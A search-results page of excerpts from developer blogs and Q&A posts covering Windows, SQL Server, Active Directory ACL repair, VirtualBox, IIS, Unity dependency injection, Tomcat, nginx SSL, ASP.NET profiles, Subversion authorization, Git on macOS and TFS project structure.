Search Results

Search found 46973 results on 1879 pages for 'return path'.


  • Error 0x6ba (RPC server is unavailable) when running sfc /scannow on Windows XP in Safe Mode

    - by leeand00
    I think that my mup.sys file is corrupt. I received the following error when trying to access a network share located on my Windows 7 box from my Windows XP box: "No network provider accepted the given network path." After reading this I attempted to follow the directions by rebooting my computer into Safe Mode. After I run "sfc /scannow" I receive the following error message: "The specific error code is 0x000006ba [The RPC server is unavailable]." When I go into Services, it says that the Remote Procedure Call (RPC) service is running but that the Remote Procedure Call (RPC) Locator is not running. When I try to start the Remote Procedure Call (RPC) Locator, it gives me an error saying: "Error 1084: This service cannot be started in Safe Mode." What can I do about this if it can't find the Remote Procedure Call service in Safe Mode?

    Read the article

  • SQL SERVER – Installing AdventureWorks for SQL Server 2011

    - by pinaldave
    I just began with SQL Server 2011 Denali CTP1. The very first thing I realized is that there is no AdventureWorks sample database available for Denali. I quickly searched online and found Microsoft documentation which explains how to install (restore) AdventureWorks for SQL Server 2011 Denali. Download AdventureWorks from here, then run the following script (replace the path to the mdf file with your own):
        CREATE DATABASE AdventureWorks2008R2 ON
        (FILENAME = 'C:\SQL 11 CTP1\CTP1\AdventureWorks2008R2_Data.mdf')
        FOR ATTACH_REBUILD_LOG;
    When you run the above script it will give you the following messages, and you are DONE!
        File activation failure. The physical file name "C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\DATA\AdventureWorks2008R2_Log.ldf" may be incorrect.
        New log file 'C:\SQL 11 CTP1\CTP1\AdventureWorks2008R2_log.ldf' was created.
        Converting database 'AdventureWorks2008R2' from version 679 to the current version 684.
        Database 'AdventureWorks2008R2' running the upgrade step from version 679 to version 680.
        Database 'AdventureWorks2008R2' running the upgrade step from version 680 to version 681.
        Database 'AdventureWorks2008R2' running the upgrade step from version 681 to version 682.
        Database 'AdventureWorks2008R2' running the upgrade step from version 682 to version 683.
        Database 'AdventureWorks2008R2' running the upgrade step from version 683 to version 684.
    I will soon write about my experience with Denali. However, SQL Server Management Studio has started to look more like Visual Studio. Reference: Pinal Dave (http://blog.sqlauthority.com) Filed under: Pinal Dave, SQL, SQL Authority, SQL Backup and Restore, SQL Query, SQL Scripts, SQL Server, SQL Server Management Studio, SQL Tips and Tricks, T SQL, Technology
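    Following up on the attach script above: a quick smoke test along these lines confirms the database is usable (a minimal sketch of mine, not from the original post; the table name assumes the standard AdventureWorks2008R2 schema):
        USE AdventureWorks2008R2;
        SELECT COUNT(*) FROM Person.Person;
    Getting a row count back means the attach and the log rebuild completed successfully.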

    Read the article

  • [Visual Studio Extension Of The Day] Test Scribe for Visual Studio Ultimate 2010 and Test Professional 2010

    - by Hosam Kamel
      Test Scribe is a documentation power tool designed to construct documents directly from TFS for test plan and test run artifacts, for purposes such as discussion and reporting.
      Known Issues/Limitations:
      Customizing the generated report by changing the template, adding comments, including attachments, etc. is not supported.
      While opening a test plan summary document in Office 2007, if you get the warning: "The file Test Plan Summary cannot be opened because there are problems with the contents" (with Details: 'The file is corrupt and cannot be opened'), click 'OK'. Then, click 'Yes' to recover the contents of the document. This will then open the document in Office 2007. The same problem is not found in Office 2010.
      Generated documents are stored by default in the "My Documents" folder. The output path of the generated report cannot be modified.
      Exporting Word documents for individual test suites or test cases in a test plan is not supported.
      Download it from the Visual Studio Extension Manager. Originally posted at "Hosam Kamel | Developer & Platform Evangelist" http://blogs.msdn.com/hkamel

    Read the article

  • Modifying AD Schema permissions from the command line

    - by Ryan Roussel
    Recently while making some changes for a client, I accidentally dug myself into a pretty deep hole. I was trying to explicitly deny a certain user from reading a few group policies, including the Default Domain Policy. When I went in to make the change I accidentally denied Authenticated Users rather than the AD user object. This of course made the GPO inaccessible to all users, including any with domain admin rights. The policy could no longer be modified in the GPMC and, worse, changes could not be made through ADSIedit. The errors I was getting from inside ADSIedit when trying to edit the container looked like this:
        This object has one or more property sheets currently open.
        Invalid path to object
    The only solution was to strip Authenticated Users from the container ACL completely in the schema, then re-add it back with the default read and apply rights. To perform this action, I used a command I had never used before: DSACLS.exe. It's part of the DSMOD group of tools. Since this command interacts with the actual schema, you have to know the full LDAP container or object name - in this case the GUID of the Default Domain Policy: {31B2F340-016D-11D2-945F-00C04FB984F9}. The actual commands I ran looked like this.
    To display the current ACL of the container:
        c:\>dsacls "cn={31B2F340-016D-11D2-945F-00C04FB984F9},cn=Policies,cn=System,dc=domain,dc=com" /A
    To strip Authenticated Users from the ACL of the container:
        c:\>dsacls "cn={31B2F340-016D-11D2-945F-00C04FB984F9},cn=Policies,cn=System,dc=domain,dc=com" /R "NT Authority\Authenticated Users"
    For a full reference of the DSACLS.EXE command visit: http://support.microsoft.com/kb/281146
    Once Authenticated Users was cleared from the ACL, I was able to use the Group Policy Management Console to reassign the default permissions.
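    For reference, the re-add could also be scripted with dsacls rather than done through GPMC. A sketch along these lines (the rights syntax and defaults below are my assumption - verify against your environment before running): /G grants, GR is generic read, and CA;<right> names a control access right such as Apply Group Policy.
        c:\>dsacls "cn={31B2F340-016D-11D2-945F-00C04FB984F9},cn=Policies,cn=System,dc=domain,dc=com" /G "NT Authority\Authenticated Users:GR"
        c:\>dsacls "cn={31B2F340-016D-11D2-945F-00C04FB984F9},cn=Policies,cn=System,dc=domain,dc=com" /G "NT Authority\Authenticated Users:CA;Apply Group Policy"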

    Read the article

  • Ubuntu 13.10 install ISO crashes on VirtualBox Mac 4.3

    - by John Allsup
    Does anybody know what to do about this? Machine is a 2008 Core 2 Duo iMac with 4GB RAM. (And 64bit Debian 7 boots OK, but I've not tried installing under the latest version of VirtualBox as I have just upgraded VBox today.) VirtualBox 4.3, upon trying to boot a machine with the Ubuntu 13.10 (64bit) iso (with the VM configured for Ubuntu 64bit), crashes with the following information:
        Failed to open a session for the virtual machine Ubuntu64. The VM session was aborted.
        Result Code: NS_ERROR_FAILURE (0x80004005)
        Component: SessionMachine
        Interface: ISession {12f4dcdb-12b2-4ec1-b7cd-ddd9f6c5bf4d}
    === Head of crash dump is below
        Process: VirtualBoxVM [716]
        Path: /Applications/VirtualBox.app/Contents/MacOS/VirtualBoxVM
        Identifier: VirtualBoxVM
        Version: ??? (???)
        Code Type: X86 (Native)
        Parent Process: VBoxSVC [644]
        Date/Time: 2013-10-17 22:58:23.679 +0100
        OS Version: Mac OS X 10.6.8 (10K549)
        Report Version: 6
        Exception Type: EXC_BAD_ACCESS (SIGBUS)
        Exception Codes: KERN_PROTECTION_FAILURE at 0x0000000000000040
        Crashed Thread: 0 Dispatch queue: com.apple.main-thread
        Thread 0 Crashed: Dispatch queue: com.apple.main-thread
        0 com.apple.CoreFoundation 0x92a25c03 CFSetApplyFunction + 83
        1 com.apple.framework.IOKit 0x95557ad4 __IOHIDManagerInitialEnumCallback + 69
        2 com.apple.CoreFoundation 0x92a2442b __CFRunLoopDoSources0 + 1563
        3 com.apple.CoreFoundation 0x92a21eef __CFRunLoopRun + 1071
        4 com.apple.CoreFoundation 0x92a213c4 CFRunLoopRunSpecific + 452
        5 com.apple.CoreFoundation 0x92a211f1 CFRunLoopRunInMode + 97
        6 com.apple.HIToolbox 0x98eb5e04 RunCurrentEventLoopInMode + 392
        7 com.apple.HIToolbox 0x98eb5af5 ReceiveNextEventCommon + 158
        8 com.apple.HIToolbox 0x98eb5a3e BlockUntilNextEventMatchingListInMode + 81
        9 com.apple.AppKit 0x9971b595 _DPSNextEvent + 847
        10 com.apple.AppKit 0x9971add6 -[NSApplication nextEventMatchingMask:untilDate:inMode:dequeue:] + 156
        11 com.apple.AppKit 0x996dd1f3 -[NSApplication run] + 821
        12 QtGuiVBox 0x019f19e1 QEventDispatcherMac::processEvents(QFlags<QEventLoop::ProcessEventsFlag>) + 1505
        13 QtCoreVBox 0x018083b1 QEventLoop::processEvents(QFlags<QEventLoop::ProcessEventsFlag>) + 65
        14 QtCoreVBox 0x018086fa QEventLoop::exec(QFlags<QEventLoop::ProcessEventsFlag>) + 170
        15 QtGuiVBox 0x01eea9e5 QDialog::exec() + 261
        16 VirtualBox.dylib 0x011234b8 TrustedMain + 1108104
        17 VirtualBox.dylib 0x01126d68 TrustedMain + 1122616
        18 VirtualBox.dylib 0x010fac19 TrustedMain + 942057
        19 VirtualBox.dylib 0x010f9b3d TrustedMain + 937741
        20 VirtualBox.dylib 0x010f81dd TrustedMain + 931245
        21 VirtualBox.dylib 0x010f85b8 TrustedMain + 932232
        22 VirtualBox.dylib 0x0109d4f8 TrustedMain + 559304
        23 VirtualBox.dylib 0x0101521e TrustedMain + 1518
        24 ...virtualbox.app.VirtualBoxVM 0x00002e7e start + 2766
        25 ...virtualbox.app.VirtualBoxVM 0x000024b5 start + 261
        26 ...virtualbox.app.VirtualBoxVM 0x000023e5 start + 53
    ==== And please somebody fix the code so that you can just delimit large blocks of code at the start and the end without indenting every line manually by 4 spaces.

    Read the article

  • 401 - Unauthorized On Server 2008 R2 IIS 7.5

    - by mxmissile
    I have a web application deployed to Server 2008 IIS 7.5 box. From remote it gives this error: 401 - Unauthorized: Access is denied due to invalid credentials. (remote = desktops on the same LAN) Have tried several remote clients using different browsers, all the same result. (IE, FF, and Chrome) Hitting the application from the desktop of the server itself works flawlessly. The application is using Anonymous Authentication. The application is written in .NET 4.0 Asp.Net using the MVC framework. Sysinternals procmon returns these 2 results for each request: FAST IO DISALLOWED and PATH NOT FOUND. I have 2 other MVC apps running fine on the same server. I have checked the security on the folders and they all match. App runs fine on a Server 2008 IIS 7.0 box. Nothing shows up in the Event log on the server related to this. Pulling my hair out here, any troubleshooting tips?

    Read the article

  • Dependency Injection in ASP.NET MVC NerdDinner App using Unity 2.0

    - by shiju
    In my previous post, Dependency Injection in ASP.NET MVC NerdDinner App using Ninject, we did dependency injection in the NerdDinner application using Ninject. In this post, I demonstrate how to apply dependency injection in the ASP.NET MVC NerdDinner app using Microsoft Unity Application Block (Unity) 2.0.
    Unity 2.0
    Unity 2.0 is available on CodePlex at http://unity.codeplex.com. In earlier versions of Unity, the ObjectBuilder generic dependency injection mechanism, which was distributed as a separate assembly, is now integrated into the Unity core assembly, so you no longer need to reference the ObjectBuilder assembly in your applications. Two additional built-in lifetime managers - HierarchicalLifetimeManager and PerResolveLifetimeManager - have been added to Unity 2.0.
    Dependency Injection in NerdDinner using Unity
    In my Ninject post on NerdDinner, we discussed the interfaces and concrete types of the NerdDinner application and how to inject dependencies into controller constructors. The following steps configure Unity 2.0 to apply controller injection in the NerdDinner application.
    Step 1 – Add references for the Unity Application Block
    Open the NerdDinner solution and add references to Microsoft.Practices.Unity.dll and Microsoft.Practices.Unity.Configuration.dll. You can download Unity from http://unity.codeplex.com.
    Step 2 – Controller Factory for Unity
    The controller factory is responsible for creating controller instances. We extend the built-in default controller factory with our own factory so that Unity works with ASP.NET MVC.
        public class UnityControllerFactory : DefaultControllerFactory
        {
            protected override IController GetControllerInstance(RequestContext reqContext, Type controllerType)
            {
                IController controller;
                if (controllerType == null)
                    throw new HttpException(404, String.Format(
                        "The controller for path '{0}' could not be found or it does not implement IController.",
                        reqContext.HttpContext.Request.Path));
                if (!typeof(IController).IsAssignableFrom(controllerType))
                    throw new ArgumentException(
                        string.Format("Type requested is not a controller: {0}", controllerType.Name),
                        "controllerType");
                try
                {
                    controller = MvcUnityContainer.Container.Resolve(controllerType) as IController;
                }
                catch (Exception ex)
                {
                    throw new InvalidOperationException(String.Format(
                        "Error resolving controller {0}", controllerType.Name), ex);
                }
                return controller;
            }
        }

        public static class MvcUnityContainer
        {
            public static IUnityContainer Container { get; set; }
        }
    Step 3 – Register Types and Set the Controller Factory
        private void ConfigureUnity()
        {
            // Create the UnityContainer
            IUnityContainer container = new UnityContainer()
                .RegisterType<IFormsAuthentication, FormsAuthenticationService>()
                .RegisterType<IMembershipService, AccountMembershipService>()
                .RegisterInstance<MembershipProvider>(Membership.Provider)
                .RegisterType<IDinnerRepository, DinnerRepository>();
            // Set the container for the controller factory
            MvcUnityContainer.Container = container;
            // Set the controller factory to UnityControllerFactory
            ControllerBuilder.Current.SetControllerFactory(typeof(UnityControllerFactory));
        }
    Unity 2.0 provides a fluent interface for type configuration, so you can call all the methods in a single statement. The Unity configuration in the ConfigureUnity method above says: inject an instance of DinnerRepository when there is a request for IDinnerRepository, inject an instance of FormsAuthenticationService when there is a request for IFormsAuthentication, and inject an instance of AccountMembershipService when there is a request for IMembershipService. The AccountMembershipService class has a dependency on the ASP.NET membership provider, so we configure the container to inject the instance of the membership provider. After registering the types, we set UnityControllerFactory as the current controller factory:
        // Set the container for the controller factory
        MvcUnityContainer.Container = container;
        // Set the controller factory to UnityControllerFactory
        ControllerBuilder.Current.SetControllerFactory(typeof(UnityControllerFactory));
    When you register a type by using the RegisterType method, the default behavior is for the container to use a transient lifetime manager: it creates a new instance of the registered, mapped, or requested type each time you call the Resolve or ResolveAll method or when the dependency mechanism injects instances into other classes. The following lifetime managers are provided by Unity 2.0:
    ContainerControlledLifetimeManager - Implements a singleton behavior for objects. The object is disposed of when you dispose of the container.
    ExternallyControlledLifetimeManager - Implements a singleton behavior, but the container doesn't hold a reference to the object, which will be disposed of when out of scope.
    HierarchicalLifetimeManager - Implements a singleton behavior for objects. However, child containers don't share instances with parents.
    PerResolveLifetimeManager - Implements a behavior similar to the transient lifetime manager, except that instances are reused across build-ups of the object graph.
    PerThreadLifetimeManager - Implements a singleton behavior for objects, but limited to the current thread.
    TransientLifetimeManager - Returns a new instance of the requested type for each call (the default behavior).
    We can also create a custom lifetime manager for the Unity container. The following code creates a custom lifetime manager that stores instances in the current HttpContext:
        public class HttpContextLifetimeManager<T> : LifetimeManager, IDisposable
        {
            public override object GetValue()
            {
                return HttpContext.Current.Items[typeof(T).AssemblyQualifiedName];
            }
            public override void RemoveValue()
            {
                HttpContext.Current.Items.Remove(typeof(T).AssemblyQualifiedName);
            }
            public override void SetValue(object newValue)
            {
                HttpContext.Current.Items[typeof(T).AssemblyQualifiedName] = newValue;
            }
            public void Dispose()
            {
                RemoveValue();
            }
        }
    Step 4 – Modify Global.asax.cs to configure the Unity container
    In the Application_Start event, we call the ConfigureUnity method to configure the Unity container and set the controller factory to UnityControllerFactory:
        void Application_Start()
        {
            RegisterRoutes(RouteTable.Routes);
            ViewEngines.Engines.Clear();
            ViewEngines.Engines.Add(new MobileCapableWebFormViewEngine());
            ConfigureUnity();
        }
    Download Code
    You can download the modified NerdDinner code from http://nerddinneraddons.codeplex.com
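    As a usage footnote to the custom lifetime manager above (my sketch, not from the original post): it plugs into the same fluent registration used in Step 3, since RegisterType accepts a LifetimeManager instance. Here the repository is scoped to the current HTTP request:
        // inside ConfigureUnity, instead of the transient default
        container.RegisterType<IDinnerRepository, DinnerRepository>(
            new HttpContextLifetimeManager<IDinnerRepository>());
    Swapping lifetimes this way requires no change to the code that resolves the type.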

    Read the article

  • Tomcat6 Manager Webapp is 404 on apt-get install on Ubuntu 10.10

    - by Noel
    http://localhost:8080/manager/html gives a 404 error on an apt-get install of tomcat6 (6.0.28 on JVM 1.6.0_20-b20 on 2.6.35-27-generic amd64). http://localhost:8080/host-manager/html works, and lists one Host name, localhost. Installed tomcat6-admin with apt-get.
        $ dpkg -l | grep -i tomcat6-admin
        ii tomcat6-admin 6.0.28-2ubuntu1.1 Servlet and JSP engine -- admin web applications
        $ cat /usr/share/tomcat6/conf/tomcat-users.xml
        <tomcat-users>
          <role rolename="admin"/>
          <role rolename="manager" />
          <user username="tomcatuser" password="Password1" roles="admin,manager"/>
        </tomcat-users>
        $ cat /usr/share/tomcat6/conf/Catalina/localhost/manager.xml
        <Context path="/manager" docBase="/usr/share/tomcat6-admin/manager" antiResourceLocking="false" privileged="true" />
        <role name="manager" />
        <user name="manager" password="Password1" roles="manager" />
        <user name="tomcatuser" password="Password1" roles="manager" />
    Those two files are the only documentation I've seen on how to set up the Manager webapp, and they seem to be compliant with the requirements.
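    For comparison (my note, not part of the original question): the standard Tomcat 6 setup keeps role and user definitions only in tomcat-users.xml, while the context file holds just the Context element. A minimal known-good pair, with placeholder user name and password, would look roughly like this:
        <!-- conf/tomcat-users.xml -->
        <tomcat-users>
          <role rolename="manager"/>
          <user username="admin" password="secret" roles="manager"/>
        </tomcat-users>
        <!-- conf/Catalina/localhost/manager.xml -->
        <Context path="/manager" docBase="/usr/share/tomcat6-admin/manager" antiResourceLocking="false" privileged="true" />
    The role and user elements pasted after the Context element in the question are not part of the context file format.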

    Read the article

  • Nginx ssl - SSL: error:0906D06C:PEM routines:PEM_read_bio:no start line

    - by Alex
    I am trying to enable SSL on a server using a certificate from 123-reg but I keep getting this error:
        nginx: [emerg] SSL_CTX_use_certificate_chain_file("/opt/nginx/conf/cleantechlms.crt") failed (SSL: error:0906D06C:PEM routines:PEM_read_bio:no start line error:140DC009:SSL routines:SSL_CTX_use_certificate_chain_file:PEM lib)
    This is my nginx config:
        server {
          listen 443;
          server_name a-fake-url.com;
          root /file/path/public;
          passenger_enabled on;
          ssl on;
          ssl_certificate /opt/nginx/conf/cleantechlms.crt;
          ssl_certificate_key /opt/nginx/conf/cleantechlms.key;
        }
    I have tried setting full file permissions on my crt and key but there is no difference. My crt file is the crt I was issued concatenated with the CA crt.
    Update: I have tried copying both certificates into separate files and then running 'cat mykey.crt ca.cert'. I also tried manually copying the keys into the same file. Any ideas?
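    A quick sanity check for a concatenated PEM bundle (my sketch, reusing the file name from the config above): the "no start line" error usually means a -----BEGIN CERTIFICATE----- header is missing, mangled, or run together with the end of the previous block.
        openssl x509 -in /opt/nginx/conf/cleantechlms.crt -noout -subject
        grep -c 'BEGIN CERTIFICATE' /opt/nginx/conf/cleantechlms.crt
    The first command should print the server certificate's subject (it parses the first PEM block); the second should count one match per certificate in the chain, with the server certificate first, the CA certificate after it, and each BEGIN line starting on its own line.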

    Read the article

  • ASP.NET MVC Custom Profile Provider

    - by Ben Griswold
    It’s been a long while since I last used the ASP.NET Profile provider. It’s a shame, too, because it just works with very little development effort: Membership tables installed? Check. Profile enabled in web.config? Check. SqlProfileProvider connection string set? Check. Profile properties defined in said web.config file? Check. Write code to set value, read value, build and test. Check. Check. Check. Yep, I thought the built-in Profile stuff was pure gold until I noticed how the user-based information is persisted to the database. It’s stored as XML and, well, that was going to be trouble if I ever wanted to query the profile data. So, I have avoided the super-easy-to-use ASP.NET Profile provider ever since - until this week, when I decided I could use it to store user-specific properties which I am 99% positive I’ll never need to query against, ever. I opened up my ASP.NET MVC application, completed steps 1-4 (above) in about 3 minutes, started writing my profile get/set code, and that’s where the plan broke down. Oh yeah. That’s right. Visual Studio auto-generates a strongly-typed Profile reference for web site projects but not for ASP.NET MVC or Web Application projects. Bummer. So, I went through the steps of getting a custom profile provider working in my ASP.NET MVC application. First, I defined a CurrentUser routine and my profile properties in a custom Profile class like so:
        using System.Web.Profile;
        using System.Web.Security;
        using Project.Core;

        namespace Project.Web.Context
        {
            public class MemberPreferencesProfile : ProfileBase
            {
                static public MemberPreferencesProfile CurrentUser
                {
                    get
                    {
                        return (MemberPreferencesProfile)Create(Membership.GetUser().UserName);
                    }
                }

                public Enums.PresenceViewModes? ViewMode
                {
                    get { return ((Enums.PresenceViewModes)(base["ViewMode"] ?? Enums.PresenceViewModes.Category)); }
                    set { base["ViewMode"] = value; Save(); }
                }
            }
        }
    And then I replaced the existing profile configuration in web.config with the following:
        <profile enabled="true" defaultProvider="MvcSqlProfileProvider"
                 inherits="Project.Web.Context.MemberPreferencesProfile">
          <providers>
            <clear/>
            <add name="MvcSqlProfileProvider"
                 type="System.Web.Profile.SqlProfileProvider, System.Web, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"
                 connectionStringName="ApplicationServices" applicationName="/"/>
          </providers>
        </profile>
    Notice that profile is enabled, I’ve defined the defaultProvider, and profile now inherits from my custom MemberPreferencesProfile class. Finally, I am now able to set and get profile property values nearly the same way as I did with website projects:
        viewMode = MemberPreferencesProfile.CurrentUser.ViewMode;
        MemberPreferencesProfile.CurrentUser.ViewMode = viewMode;

    Read the article

  • Using AuthzSVNAccessFile for controlling SVN Access produces HTTP 400 Bad Request

    - by meeper
    I have a new repository on an existing Subversion server that requires us to perform path-based authorization within the repository. I found that the AuthzSVNAccessFile directive in Apache is directly responsible for allowing this functionality. After fixing several other problems, such as AuthzSVNAccessFile preventing SVNListParentPath from operating properly, I am left with one single problem: I can checkout, I can update, I can commit, BUT I cannot execute an SVN COPY for performing branch/tagging operations. The moment I comment out the AuthzSVNAccessFile line in the Apache config, everything works as expected except the obvious path authorizations.
    Versions:
        The server OS is Debian 6.0.7 (Squeeze)
        Apache 2.2.16-6+squeeze11
        Server Subversion 1.6.12dfsg-7
        Clients are running Windows. Clients tried are:
        TortoiseSVN 1.8.2 Build 24708 64bit
        SVN CLI Client 1.8.3 (r1516576)
    Authentication is performed via AD to a Windows 2003 domain and appears to be operating normally. I have stripped out all other configurations and repository setups to produce this single configuration that reproduces the problem.
    Apache configuration:
        <VirtualHost *:443>
            ServerName svn-test.company.com
            ServerAlias /svn-test
            ServerAdmin [email protected]
            SSLEngine On
            SSLCertificateFile /etc/apache2/apache.pem
            ErrorLog /var/log/apache2/svn-test_error.log
            LogLevel warn
            CustomLog /var/log/apache2/svn-test_access.log combined
            ServerSignature On
            # Repository Access to all Repositories
            <Location "/">
                DAV svn
                SVNParentPath /var/svn
                SVNListParentPath on
                AuthBasicProvider ldap
                AuthType Basic
                AuthzLDAPAuthoritative Off
                AuthName "Subversion Test Repository System"
                AuthLDAPURL "ldap://adserver.company.com:389/DC=corp,DC=company,DC=com?sAMAccountName?sub?(objectClass=*)" NONE
                AuthLDAPBindDN "CN=service_account,OU=ServiceIDs,OU=corp,OU=Delegated,DC=na,DC=corp,DC=company,DC=com"
                AuthLDAPBindPassword service_account_password
                Require valid-user
                SSLRequireSSL
            </Location>
            # <LocationMatch /.+> is a really dirty trick to make listing of repositories work
            # http://d.hatena.ne.jp/shimonoakio/20080130/1201686016
            <LocationMatch /.+>
                AuthzSVNAccessFile /etc/apache2/svn_path_auth
            </LocationMatch>
        </VirtualHost>
    SVN access file:
        [/]
        * = rw
    The repository used (AuthTestBasic) consists of the following directory structure and contains no externals (this is a literal listing, not an example):
        /
        /branches/
        /tags/
        /trunk/
        /trunk/somefile.txt
    Tortoise produces the following error during a tag operation in its tag result window:
        Adding directory failed: COPY on /authtestbasic/!svn/bc/2/trunk (400 Bad Request)
    The svn.exe CLI client produces the following error:
        C:\Users\e20epkt>svn copy https://servername/authtestbasic/trunk https://servername/authtestbasic/tags/tag1 -m "svn cli client"
        svn: E175002: Adding directory failed: COPY on /authtestbasic/!svn/bc/2/trunk (400 Bad Request)
    The Apache error log has nothing in it; however, the Apache access log has the following in it (IP addresses and usernames changed, obviously):
        10.1.2.100 - - [17/Oct/2013:11:53:40 -0700] "OPTIONS /authtestbasic/trunk HTTP/1.1" 401 2595 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"
        10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "OPTIONS /authtestbasic/trunk HTTP/1.1" 200 996 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"
        10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "OPTIONS /authtestbasic/trunk HTTP/1.1" 200 884 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"
        10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "PROPFIND /authtestbasic/trunk HTTP/1.1" 207 692 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"
        10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "PROPFIND /authtestbasic/!svn/vcc/default HTTP/1.1" 207 596 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"
        10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "REPORT /authtestbasic/!svn/bc/0/trunk HTTP/1.1" 404 580 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"
        10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "PROPFIND /authtestbasic/!svn/vcc/default HTTP/1.1" 207 596 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"
        10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "REPORT /authtestbasic/!svn/bc/2/trunk HTTP/1.1" 200 674 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"
        10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "PROPFIND /authtestbasic/!svn/bc/2/trunk HTTP/1.1" 207 548 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"
        10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "PROPFIND /authtestbasic/tags/tag1 HTTP/1.1" 404 580 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"
        10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "MKACTIVITY /authtestbasic/!svn/act/f1e9dc07-fb5e-5a41-ac22-907705ef6e5e HTTP/1.1" 201 708 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"
        10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "PROPFIND /authtestbasic/tags HTTP/1.1" 207 580 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"
        10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "CHECKOUT /authtestbasic/!svn/vcc/default HTTP/1.1" 201 708 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"
        10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "PROPPATCH /authtestbasic/!svn/wbl/f1e9dc07-fb5e-5a41-ac22-907705ef6e5e/2 HTTP/1.1" 207 596 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"
        10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "CHECKOUT /authtestbasic/!svn/ver/1/tags HTTP/1.1" 201 724 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"
        10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "COPY /authtestbasic/!svn/bc/2/trunk HTTP/1.1" 400 596 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"
        10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "DELETE /authtestbasic/!svn/act/f1e9dc07-fb5e-5a41-ac22-907705ef6e5e HTTP/1.1" 204 1956 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"
    You'll see that the second-to-last line contains the COPY command with the HTTP 400 response; however, there doesn't appear to be any indication as to why. Please note that, while yes, this is a test repository on a test server, I am experiencing this same issue in this test setup where I have eliminated all other possible causes (mixed repository configurations, externals, etc.). I have also confirmed that all files for the repository (/var/svn/authtestbasic) are owned by the Apache user www-data.
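    One detail worth noting about the access file (my aside, not part of the original question): a bare [/] section applies to every repository served from SVNParentPath, while rules can also be scoped to a single repository with a [repo:path] section, e.g. a sketch for this repository:
        [authtestbasic:/]
        * = rw
    This makes per-repository path authorization explicit, though it does not by itself explain the COPY failure.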

    Read the article

  • Install Git under OSX Mavericks

    - by Jan Hancic
    I've just completed a fresh install of Mavericks. Then I went to git-scm.com, downloaded the Mac installer and installed Git from that. Now whenever I go into the terminal and type git I get this:
        xcode-select: note: no developer tools were found at '/Applications/Xcode.app', requesting install. Choose an option in the dialog to download the command line developer tools.
    I also see this dialog (screenshot omitted). The Git installer installed Git into /usr/local/git/bin and I've added this to my PATH, but still no dice. What am I doing wrong here? I don't want to install Xcode just so I can use Git.
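    A couple of command-line checks that often explain this symptom (my sketch; the path below is the git-scm.com installer default): the Xcode shim at /usr/bin/git can shadow the new install because /usr/bin comes earlier in the default PATH, so the entry needs to be prepended rather than appended:
        which git                                  # see which git wins
        export PATH="/usr/local/git/bin:$PATH"     # prepend, e.g. in ~/.bash_profile
        hash -r                                    # drop bash's cached lookup
    Alternatively, on Mavericks, running xcode-select --install downloads only the command line tools, without the full Xcode IDE.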

    Read the article

  • When should I use Areas in TFS instead of Team Projects

    - by Martin Hinshelwood
    Well, it depends…. If you are a small company that creates a finite number of internal projects then you will find it easier to create a single project for each of your products and have TFS do the heavy lifting with reporting, SharePoint sites and version control. But what if you are not…
    Update 9th March 2010
    Michael Fourie gave me some feedback which I have integrated. Ed Blankenship via @edblankenship offered encouragement and a nice quote. Ewald Hofman gave me a couple of Cons, and maybe a few more soon. Ewald's company, Avanade, currently uses Areas, but it looks like the manual management is getting too much and the project is getting cluttered.
    What if you are likely to have hundreds of projects, possibly with a multitude of internal and external projects? You might have 1 project for a customer or 10. This is the situation that most consultancies find themselves in, and thus they need a more sustainable and maintainable option. What I am advocating is that we should have one "Team Project" per customer, and use areas to create "sub-projects" within that single "Team Project".
    "What you describe is what we generally do internally and what we recommend. We make very heavy use of area path to categorize the work within a larger project." - Brian Harry, Microsoft Technical Fellow & Product Unit Manager for Team Foundation Server
    "We tend to use areas to segregate multiple projects in the same team project and it works well." - Tiago Pascoal, Visual Studio ALM MVP
